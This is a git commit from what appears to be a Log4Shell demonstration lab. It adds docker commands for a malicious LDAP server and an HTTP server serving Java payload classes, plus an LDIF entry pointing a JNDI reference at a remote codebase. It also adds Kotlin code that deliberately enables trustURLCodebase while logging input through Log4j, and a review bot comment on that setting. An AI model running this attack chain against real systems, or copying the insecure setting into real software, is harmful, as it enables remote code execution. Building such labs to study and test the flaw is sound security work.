
Added insecure java config

master
Ivan Ivanov 8 months ago
parent
commit
7cd1ed67b9
  1. 16
      attacker/README.md
  2. 9
      attacker/ldap/log4sh.ldif
  3. 2
      src/Main.kt

16
attacker/README.md

@ -1,16 +1,21 @@
# Attacker
Hosts an ldap with data from ldap/*.ldif files
An LDAP with data from ldap/*.ldif files
An HTTP server serving compiled .class files from .java files in ./src
Hosts an HTTP server serving built classes from files in ./src
You have to compile those files with
## Usage
Don't forget to
cd attacker
Compile your java payload
javac http/src/*.java -d /http/output/
## Usage
Build and run ldap
docker build ldap -t badldap
docker run --rm -d -p 1389:389 badldap
@ -28,4 +33,5 @@ Everything
docker kill `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"` 2> /dev/null; docker build ldap -t badldap; docker build http -t badhttp; docker run --rm -d -p 1389:389 badldap; docker run --rm -d -p 8088:3000 badhttp
Logs
for name in `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"`; do docker logs -f $name &; done

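--- a/attacker/ldap/log4sh.ldif
+++ b/attacker/ldap/log4sh.ldif
@@ -0,0 +1,9 @@
+dn: cn=log4sh,dc=example,dc=org
+cn: log4sh
+javaClassName: patching
+javaCodebase: http://172.17.0.1:8088/
+javaFactory: Log4ShellHotpatch
+objectClass: top
+objectClass: javaContainer
+objectClass: javaObject
+objectClass: javaNamingReference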

2
src/Main.kt

@ -7,6 +7,8 @@ val logger: Logger = LogManager.getLogger()
fun work(input: String)
{
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")
logger.info(System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase"))
logger.info("Working on {}", input)
}
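Review bot: The added `System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")` runs unconditionally on every call to `work()` and is JVM-wide, so every JNDI LDAP lookup in the process, not just this demo path, trusts remote codebases from then on. Since the commit title says the setting is deliberately insecure, it should be applied once at startup behind an explicit lab-only opt-in and carry a comment saying so, e.g. `// LAB ONLY: re-enables remote codebase loading for JNDI/LDAP JVM-wide; never enable outside the isolated demo` and `if (System.getenv("LAB_INSECURE_JNDI") == "1") System.setProperty(...)` (the variable name is a placeholder). The `logger.info(System.getProperty(...))` line that follows looks like debugging output and repeats on every call; logging the value once at startup would be enough. The hunk header declares more lines than the page shows, so there may be context around `work()` that is not visible here.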
